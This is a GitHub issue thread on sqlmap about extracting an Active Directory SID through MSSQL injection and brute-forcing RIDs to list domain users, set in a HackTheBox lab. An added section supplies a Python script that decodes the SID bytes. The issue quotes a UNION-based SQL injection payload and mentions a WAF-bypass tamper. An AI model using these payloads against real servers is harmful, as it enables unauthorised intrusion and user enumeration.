
MSSQL RID Bruteforce #4188

Open
uBadRequest opened this issue May 5, 2020 · 2 comments

uBadRequest commented May 5, 2020

Is your feature request related to a problem? Please describe.
Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this:

[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'

If I use the hex flag, it looks like this...

[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'

I haven't had any luck at trying to decode this to the proper format.
The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online.
I was using the tamper charunicodeencode to bypass the WAF.

Describe the solution you'd like
Implement a method of retrieving the SID from an MSSQL server, and brute-force users' RIDs to discover the usernames of users in AD.

Describe alternatives you've considered
I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit a lot of the code and still couldn't get it to work.

Additional context
In case you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
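The two outputs quoted in the report can be decoded by hand. SUSER_SID() returns a varbinary value, and the plain run shows those bytes read two at a time as UTF-16LE code units (0x01 0x05 becomes 'ԁ', U+0501, and so on), with the pair 2B DF lost as U+FFFD because it is a lone low surrogate; the --hex run shows the same bytes, except that the pairs D1 BC and D1 81 were rendered as the UTF-8 characters 'Ѽ' and 'с'. Re-encoding those characters gives the raw bytes back, and the standard SID layout (revision byte, sub-authority count byte, 48-bit big-endian identifier authority, then little-endian 32-bit sub-authorities) yields the string form. The following script is an added example, not code from the issue or from sqlmap; the sample strings are copied from the log lines above, and the last sub-authority it reports (512) is the well-known Domain Admins RID, which matches the name passed to SUSER_SID. Note that the --hex output carries four bytes (00 02 00 00) beyond the 24-byte value quoted as "the SID"; that shorter value declares five sub-authorities but holds only four, so the parser rejects it.

```python
"""Recover a SUSER_SID() value from the two sqlmap outputs quoted above.

Added example; it is not part of the issue or of sqlmap. The sample strings
are copied from the issue's log lines; everything else is standard SID layout.
"""
from __future__ import annotations

import struct

# sqlmap --hex output from the issue, as printed. Two byte pairs (D1 BC and
# D1 81) were already rendered as UTF-8 into 'Ѽ' and 'с'; the rest are \x
# escapes or plain ASCII ('I', '+', '6').
SQLMAP_HEX_OUTPUT = (
    r"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00"
    r"Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00"
)

# The 24-byte value the issue calls "the SID" (copied from the report).
LEAKED_PREFIX_HEX = "0105000000000005150000001C00D1BCD181F1492BDFC236"


def sqlmap_hex_repr_to_bytes(text: str) -> bytes:
    """Undo the printable rendering: '\\xNN' -> one byte, ASCII -> itself,
    any other character -> the UTF-8 bytes it was decoded from."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text.startswith("\\x", i) and i + 4 <= len(text):
            out.append(int(text[i + 2:i + 4], 16))
            i += 4
        else:
            out += text[i].encode("utf-8")
            i += 1
    return bytes(out)


def parse_sid(raw: bytes) -> str:
    """Binary SID -> 'S-R-A-s1-s2-...': revision 1, 48-bit big-endian
    IdentifierAuthority, then SubAuthorityCount little-endian DWORDs."""
    if len(raw) < 8:
        raise ValueError("SID shorter than its 8-byte header")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    expected = 8 + 4 * count
    if len(raw) != expected:
        raise ValueError(
            f"SubAuthorityCount={count} needs {expected} bytes, got {len(raw)}"
        )
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{count}I", raw[8:expected])
    return f"S-{revision}-{authority}" + "".join(f"-{s}" for s in subs)


def split_rid(sid: str) -> tuple[str, int]:
    """Separate the domain SID from the trailing RID (512 is Domain Admins)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def as_utf16_text(raw: bytes) -> str:
    """What the plain (non --hex) run shows: the same bytes read as UTF-16LE
    code units. Pair 2B DF is a lone low surrogate, so it becomes U+FFFD."""
    return raw.decode("utf-16-le", errors="replace")


if __name__ == "__main__":
    raw = sqlmap_hex_repr_to_bytes(SQLMAP_HEX_OUTPUT)
    print("bytes      :", raw.hex().upper())
    sid = parse_sid(raw)
    print("SID        :", sid)
    print("domain/RID :", split_rid(sid))
    print("as nvarchar:", repr(as_utf16_text(raw)))
    try:
        parse_sid(bytes.fromhex(LEAKED_PREFIX_HEX))
    except ValueError as exc:
        print("24-byte value:", exc)
```

Running it prints the 28 raw bytes, the SID S-1-5-21-3167813660-1240564177-918740779-512, the domain part with RID 512 split off, and a reproduction of the garbled plain-mode string, which is the quickest way to confirm that the plain output is just the binary value shown as nvarchar text and that --hex is the mode to use for varbinary columns.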

uBadRequest (Author) commented May 5, 2020

Maybe this should be a bug report instead...
I was able to manually execute this query,

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT
SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))-- -

but if I try with SQLMAP, it says...

[09:03:03] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

[screenshot]

stamparm added a commit that referenced this issue May 5, 2020
stamparm (Member) commented May 5, 2020

With the latest revision, the query bug should be fixed. Nevertheless, I have a feeling that something else will come up.
